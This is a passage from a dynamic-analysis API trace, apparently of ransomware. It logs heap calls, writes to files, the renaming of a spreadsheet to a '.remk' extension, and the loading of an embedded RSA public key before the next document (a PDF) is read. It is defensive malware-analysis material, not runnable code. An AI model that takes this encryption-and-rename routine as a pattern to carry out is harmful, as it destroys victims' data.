dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0236.213] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ce8c8 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.215] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x168ba, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x168ba, lpOverlapped=0x0) returned 1 [0236.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.216] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x168bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.216] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0236.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.216] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0236.216] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.216] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.217] CloseHandle (hObject=0x640) returned 1 [0236.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.219] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\i2qLmECFmP.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\i2qlmecfmp.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\i2qLmECFmP.xls.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\i2qlmecfmp.xls.remk")) returned 1 [0236.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.220] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.221] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9484eb0, ftCreationTime.dwHighDateTime=0x1d5df77, ftLastAccessTime.dwLowDateTime=0x3b648540, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0x3b648540, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x34aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RVx8gh-an-F-.pdf", cAlternateFileName="RVX8GH~1.PDF")) returned 1 [0236.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.222] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\RVx8gh-an-F-.pdf") returned=".pdf" [0236.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\RVx8gh-an-F-.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\rvx8gh-an-f-.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.224] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=13482) returned 1 [0236.224] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.226] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3484, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.227] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.228] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.229] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x34aa, lpOverlapped=0x0) returned 1 [0236.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.230] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.231] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.231] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.231] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.231] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.231] GetLastError () returned 0x0 [0236.231] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.231] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.231] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.231] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.231] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x34b0) returned 0x37c6278 [0236.232] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce8c8 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce910 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.232] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6a8 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc690 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.234] GetCurrentThreadId () returned 0x314 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c55b0 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.234] GetCurrentThreadId () returned 0x314 [0236.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) 